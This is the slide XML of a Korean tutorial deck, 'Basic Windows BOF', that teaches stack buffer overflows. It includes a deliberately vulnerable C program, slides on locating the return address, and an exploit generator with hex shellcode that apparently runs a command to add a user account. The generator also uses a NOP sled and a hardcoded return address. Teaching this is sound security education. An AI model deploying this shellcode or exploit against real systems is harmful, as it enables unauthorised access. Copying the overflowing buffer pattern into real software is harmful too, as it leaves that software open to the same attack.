            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>"\x54\x55\x8B\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>xEC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>\x33\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>xFF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>\x57\xC7\x45\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>xFB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>\x66\x6C\x6F\x77\xC7\x45"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>"\xF7\x6F\x76\x65\x72\xC7\x45\xF3\x61\x64\x64\x20\xC7\x45\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>xEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>\x65"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>"\x72\x20\x2F\xC7\x45\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>xEB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>\x74\x20\x75\x73\xC6\x45\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>xEA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>\x65\xC6\x45"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>"\xE9\x6E\x83\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>xEC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>\x14\x6A\x05\x8B\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>xFC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>\x83\xC7\x05\x89\x7D\xE0\x83"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>"\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>xEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>\x09\x8B\xE7\xB8\x4D\x11\x86\x7C\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>xFF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>\xD0"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>"\xB8\xA2\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>xCA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>\x81\x7C\x33\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>xFF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>\x57\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>xFF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>\xD0";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0" smtClean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char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[530];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>	FILE *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>fp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newreturn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t> = 0x0012fd80;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memset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, 0x90, 530);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memcpy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shellcode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strlen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shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>));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memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>(&amp;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[516], &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>newreturn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>, 4);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>	fp =  fopen("c:\\data.txt", "w+");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fputs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fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0" smtClean="0"/>
              <a:t>);	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fclose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fp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 테스트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 테스트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60"/>
            <a:ext cx="489084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4493" y="2760689"/>
            <a:ext cx="5536663" cy="402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공격 테스트 시연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Overflow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en-US" altLang="ko-KR" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>취약 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>프로그램 예제</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>의 이해를 위한 상식</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Return Address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>의 위치 찾기</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>로컬 공격을 위한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>쉘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> 코드 구현</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>공격 테스트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Overflow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285992"/>
            <a:ext cx="8286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취급할 수 있는 범위를 넘는 처리결과를 낳는 상태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예를 들면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>할당된 버퍼가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>취급할 수 있는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>범위를 넘어가는 입력을 넣었을 경우 발생하는 상태를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>말함</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR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취약 프로그램 예제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1428737"/>
            <a:ext cx="85725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 smtClean="0"/>
              <a:t>==== </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>소스 코드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receive.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t> ===========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#include "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>dumpcode.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US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argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>[])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char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>[512];	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count=0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>	FILE *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>	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fp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fopen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>("c:\\data.txt", "r");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fgets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buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>, 520, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>fp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buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t> = %s\n", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>buf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dumpcode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buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>, 520);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buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" smtClean="0"/>
              <a:t> code's address = 0x%08x\n", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>buf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endParaRPr lang="ko-KR" altLang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR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취약 프로그램 예제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5248343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928934"/>
            <a:ext cx="39624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char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>[512];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>사용자가 대략 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" smtClean="0"/>
              <a:t>512</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>바이트 이상의 문자열이 파일에 입력되어 있을 경우 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>fgets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>함수는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>buf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변수에 할당된 영역을 지나 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800" dirty="0" smtClean="0"/>
              <a:t>SFP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RET Address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>를 덮어쓰게 될 것이다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000" dirty="0" smtClean="0"/>
              <a:t>지역 변수에 접근하기 위해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>ebp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스택에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> 저장시켜 놓는 것이며 이 값은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Stack Frame Pointer, SFP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>로 불린다 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취약 프로그램 예제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188991"/>
            <a:ext cx="5214974" cy="573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취약 프로그램 예제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4429132"/>
            <a:ext cx="600076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2331" y="1333506"/>
            <a:ext cx="58388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err="1" smtClean="0"/>
              <a:t>Shellcode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err="1" smtClean="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>란 시스템의 특정 명령을 실행하도록 하는 기계어 코드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기계어란</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 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직접 해독하고 실행할 수 있는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" smtClean="0"/>
              <a:t>bit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 단위로 쓰인 컴퓨터 언어를 통틀어 일컫는다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기계어는 프로그램을 나타내는 가장 낮은 단계의 개념이다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8662" y="357166"/>
            <a:ext cx="7472386" cy="1000132"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3800" dirty="0" smtClean="0"/>
              <a:t>Overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="3800" dirty="0" smtClean="0"/>
              <a:t>의 이해를 위한 상식</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" alt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Address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty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1" y="1428737"/>
            <a:ext cx="8572560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그룹 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3643338" y="4143380"/>
            <a:ext cx="5214942" cy="2214578"/>
            <a:chOff x="3929058" y="4643446"/>
            <a:chExt cx="5214942" cy="221457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34765" y="4643446"/>
              <a:ext cx="5209235" cy="2214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3929058" y="6500834"/>
              <a:ext cx="1928826" cy="35719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화살표 연결선 20"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="1030" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6020055" y="3519733"/>
            <a:ext cx="857256" cy="39003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1253</TotalTime>
  <Words>369</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>화면 슬라이드 쇼(4:3)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고려청자</vt:lpstr>
      <vt:lpstr>Basic Windows BOF</vt:lpstr>
      <vt:lpstr>목  차</vt:lpstr>
      <vt:lpstr>Overflow란?</vt:lpstr>
      <vt:lpstr>취약 프로그램 예제</vt:lpstr>
      <vt:lpstr>취약 프로그램 예제</vt:lpstr>
      <vt:lpstr>취약 프로그램 예제</vt:lpstr>
      <vt:lpstr>취약 프로그램 예제</vt:lpstr>
      <vt:lpstr>Overflow의 이해를 위한 상식</vt:lpstr>
      <vt:lpstr>Return Address 찾기</vt:lpstr>
      <vt:lpstr>Return Address 찾기</vt:lpstr>
      <vt:lpstr>Return Address 확인</vt:lpstr>
      <vt:lpstr>로컬 공격을 위한 Shellcode작성</vt:lpstr>
      <vt:lpstr>공격 테스트</vt:lpstr>
      <vt:lpstr>공격 테스트</vt:lpstr>
      <vt:lpstr>공격 테스트 시연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Windows BOF</dc:title>
  <dc:creator> </dc:creator>
  <cp:lastModifiedBy>L</cp:lastModifiedBy>
  <cp:revision>136</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2007-08-20T02:08:12Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2010-09-29T06:07:50Z</dcterms:modified>
</cp:coreProperties>
</file>